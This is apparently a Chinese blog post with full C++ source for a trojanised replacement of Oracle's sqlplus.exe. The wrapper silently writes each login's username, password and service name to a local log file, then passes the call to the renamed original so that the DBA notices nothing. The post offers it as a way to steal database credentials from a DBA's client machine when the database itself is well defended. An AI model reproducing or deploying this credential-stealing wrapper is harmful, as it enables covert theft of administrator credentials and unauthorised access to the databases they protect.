SQLPlus得到数据库登录信息

当DBA登录本地或远程数据库时，为了省事，用"sqlplus 用户名/密码@连接服务名" 的方式登录数据库是再平常不过了，而我们如果将Oracle的SQLPlus换成我们自己的实现，然后当使用时，记录下它的登录信息，就得到了数据库的用户名，密码等信息。

这是一种很简单的，偷龙转凤的方式，有其局限性。但有时，如果数据库本身的防护很严，从DBA客户端这边下手，利用这种方式有时也能有意外的收获。

效果图:

这种方式跑起来和Oracle原来的是一模一样的. 光看是看不来什么地。

被记录下的登录信息:

代码如下:

/**
*author: xiongchuanliang
*desc: 用自定义的sqlplus替换掉Oracle原版的,并在自定义的程序中记录下用户的登录信息的演示
      1. 找到Oracle自带的sqlplus.exe,将其命名为其它文件
    2. 用自定义的替换掉原版
*/
#include <stdio.h>
#include <stdlib.h>

#include <Windows.h>

#include <iostream>
#include <fstream>
using namespace std;

HRESULT CMDEx(const char *pCmd) ;

//将原版的sqlplus.exe改为sqlplus_ora.exe";
const string sqlplus_path = "C:/oracle/product/11.2.0/dbhome_1/BIN/sqlplus_ora.exe";
const string oper_log = "C:/mysqlplus.log";

int main(int argc,char* argv[])
{ 
 string sqlplus_cmd = sqlplus_path;

 ofstream flog(oper_log,ios::app);
 SYSTEMTIME sys;
 if(flog){    
  GetLocalTime(&sys);
  flog<<sys.wYear<<"-"<<sys.wMonth<<"-"<<sys.wDay<<" "<<sys.wHour<<":"<<sys.wMinute<<":"<<sys.wSecond<<" ";
 }
 for(int i=1;i<argc;i++)
 {
  sqlplus_cmd.append(" ");
  sqlplus_cmd.append(argv[i]); 
  if(flog) flog<<" "<<argv[i];
 }
 if(flog){
  flog<<endl;
    flog.close();
 }
 cout<< "演示:%s\n"<<sqlplus_cmd.c_str()<<endl;
 CMDEx(sqlplus_cmd.c_str());
 return 0;
}

HRESULT CMDEx(const char *pCmd) //LPCTSTR pszCMD
{
 
#if defined(WIN32) || defined(WIN64)
 if(pCmd == NULL || pCmd[0] == 0)
 {
  return S_FALSE;
 }
 
 STARTUPINFOA  si;
 PROCESS_INFORMATION  pi;
 HANDLE  hRead, hWrite;
 SECURITY_ATTRIBUTES  sa = {0, NULL, TRUE};

 //创建匿名管道
 if(!CreatePipe(&hRead, &hWrite, &sa, 0))
 {
  return S_FALSE;
 }
 ZeroMemory( &pi, sizeof(pi) );
 ZeroMemory(&si, sizeof(STARTUPINFO));
 si.cb  = sizeof(STARTUPINFO);
 si.wShowWindow = SW_HIDE;  
 si.hStdOutput = hWrite;
 si.hStdError = hWrite;
 si.hStdInput = hRead; 
 si.dwFlags  = STARTF_USESHOWWINDOW;       

 char szCMD[1024] = {0};
 sprintf_s(szCMD,1024,"cmd.exe /C %.1000s",pCmd); 

 //创建进程执行命令
 if(CreateProcessA(NULL,szCMD , NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
 {
 
  //等待命令执行完成
  WaitForSingleObject(pi.hProcess, INFINITE);

  CloseHandle(hWrite);
  DWORD dwRet, dwReaded;
  char szBuf[256] = {0};

  //获取进程执行返回值
  GetExitCodeProcess(pi.hProcess, &dwRet); 

  //读取控制台终端输出
  while(ReadFile(hRead, szBuf, 255, &dwReaded, NULL))
  {
   szBuf[dwReaded] = 0; 
   //输入命令内容到屏幕
   cout<< szBuf <<endl;
   memset(szBuf,0,256);
  }
  CloseHandle(hRead);
  return HRESULT_FROM_WIN32(dwRet);
 }
 else
 {
  CloseHandle(hWrite);
  CloseHandle(hRead);
  return(HRESULT_FROM_WIN32(GetLastError()));
 }
#else
 return 0;
#endif
}